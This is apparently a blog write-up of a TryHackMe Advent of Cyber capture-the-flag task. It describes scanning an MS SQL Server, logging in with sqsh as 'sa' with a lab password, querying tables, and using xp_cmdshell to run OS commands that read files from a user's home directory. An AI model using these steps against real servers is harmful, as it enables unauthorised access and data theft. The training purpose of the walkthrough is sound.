McDatabaseAdmin came rushing into the room and cried to McSkidy, “We’ve been locked out of the reindeer schedule – how will Santa’s transportation work for Christmas?” The grinch has locked McDatabaseAdmin of his system. You need to probe the external surface of the server to see if you get him his access back.

MS SQL Server is a Relational Database Management System (RDBMS). One simple way to think of a relational database is a group of tables that have relations.

We covered interacting and recovering Microsoft SQL Database Server using sqsh database shell. This was part TryHackMe Advent Of Cyber 3 Day 11.

Getting Connected

First things first, I need to figure out which port the database is running on. A quick Nmap scan will sort that out. Once I have the port, I use a command-line tool called sqsh (which I like to call “squish”) to connect to the database. I just need to provide the server’s IP address, the username, and the password. A successful connection drops me into an interactive shell, ready for my commands.

Exploring the Database

The challenge tells me the database is named “reindeer” and it contains three tables: names, presents, and schedule. My goal is to pull information from each of these.

Using standard SQL commands, similar to what you’d use in MySQL, I start querying the tables.

  • From the names table, I pull all the records and find the first name of the reindeer with an ID of 9, which is “Rudolph.”
  • In the schedule table, I look for the destination of a trip scheduled for December 7th and find that it’s “Break.”
  • Finally, in the presents table, I check the quantity of “power bank” presents and find there are 25,000 of them.

Running System Commands and Finding the Flag

Here’s where it gets really fun. Microsoft SQL Server has a powerful, and often dangerous, feature called xp_cmdshell. This allows me to run commands directly on the underlying operating system.

I start by running whoami to see what user account the database is running under. Then, the final task is to find a flag hidden in the “grinch” user’s home directory. I use dir to list the contents of the user’s folders and type to read the contents of files. After a little digging, I find the flag in the Documents folder. 🚩

Technical Commands

Here are the commands I used in my terminal to navigate the database and find the flag:

  • Connecting with sqsh:Bashsqsh -S 10.10.179.159 -U sa -P <password>
  • SQL Queries:SQLSELECT * FROM reindeer.dbo.names; GO SELECT * FROM reindeer.dbo.schedule; GO SELECT * FROM reindeer.dbo.presents; GO
  • Using xp_cmdshell:SQLxp_cmdshell 'whoami'; GO xp_cmdshell 'dir C:\Users\grinch'; GO xp_cmdshell 'dir C:\Users\grinch\Documents'; GO xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt'; GO

TryHackMe Advent Of Cyber Challenge Answers

There is an open port related to MS SQL Server accessible over the network. What is the port number?

 

Knowing the MS SQL Server is running and accessible over the network, we want to check if our username and password are still valid. Using the AttackBox terminal, we will use the command sqsh (pronounced skwish), an interactive database shell.

A simple syntax would be sqsh -S server -U username -P password, where:

  • -S server is used to specify the server, for example -S MACHINE_IP
  • -U username is used to provide the username; for example, -U sa is the username that we have enabled.
  • -P password lets us specify the password.

Let’s try to run, sqsh -S MACHINE_IP -U sa -P t7uLKzddQzVjVFJp

If the connection is successful, you will get a prompt. What is the prompt that you have received?

 

McDatabaseAdmin told us the database name is reindeer and it has three tables:

 

  1. names
  2. presents
  3. schedule

To display the table names, you could use the following syntax, SELECT * FROM table_name WHERE condition.

  • SELECT * is used to return specific columns (attributes). * refers to all the columns.
  • FROM table_name to specify the table you want to read from.
  • WHERE condition to specify the rows (entities).

We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?

 

Check the table schedule. What is the destination of the trip scheduled on December 7?

 

Check the table presents. What is the quantity available for the present “Power Bank”?

 

Now, let’s see if we can run MS Windows commands while interacting with the database. Some MS SQL Servers have xp_cmdshell enabled. If this is the case, we might have access to something similar to a command prompt.

 

The command syntax is xp_cmdshell 'COMMAND';. Let’s try a simple command, whoami, which shows the user running the commands. In the terminal output below, after connecting to MS SQL Server, we tried xp_cmdshell 'whoami';, and we can see that the user is nt service\mssqlserver. This means that any command we pass to xp_cmdshell will run as nt service\mssqlserver.

There is a flag hidden in the grinch user’s home directory. What are its contents?

 

Video Walk-Through

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles